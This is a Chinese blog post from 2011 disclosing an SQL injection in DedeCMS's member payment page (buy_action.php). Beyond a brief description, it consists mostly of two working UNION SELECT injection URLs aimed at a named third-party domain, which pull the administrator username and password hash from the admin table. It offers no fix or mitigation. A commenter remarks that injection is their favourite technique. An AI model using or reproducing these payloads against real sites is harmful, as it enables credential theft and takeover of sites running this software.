当前位置: iick's blog > 网站漏洞 > DedeCMS 支付页面 注入漏洞

DedeCMS 支付页面 注入漏洞

作者:hack1990 时间:11-03-31 阅读数:1279人阅读

 

影响版本:dedecms.
官方网站:http://www.dedecms.com

漏洞类型:SQL注入

漏洞描述:DedeCMS. 织梦buy_action.php存在注入,可利用SQL查询代码爆管理员用户密码。
漏洞测试:

首先注册个用户,注册地址:
http://www.heimian.com/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
http://www.heimian.com/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
http://www.heimian.com/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

# mysql查询记录的行号# MySQL数据库猜密码脚本PHP版# Nmap Security Scanner 7.0

上一篇:全面封杀WVS扫描器扫描网站目录思路

下一篇:WordPress备份插件远程包含漏洞

相关文章

评论列表

  •  
    发布于 2011-04-03 03:01:34  回复
  • 最喜欢的还是注入……其他的都是浮云

发表评论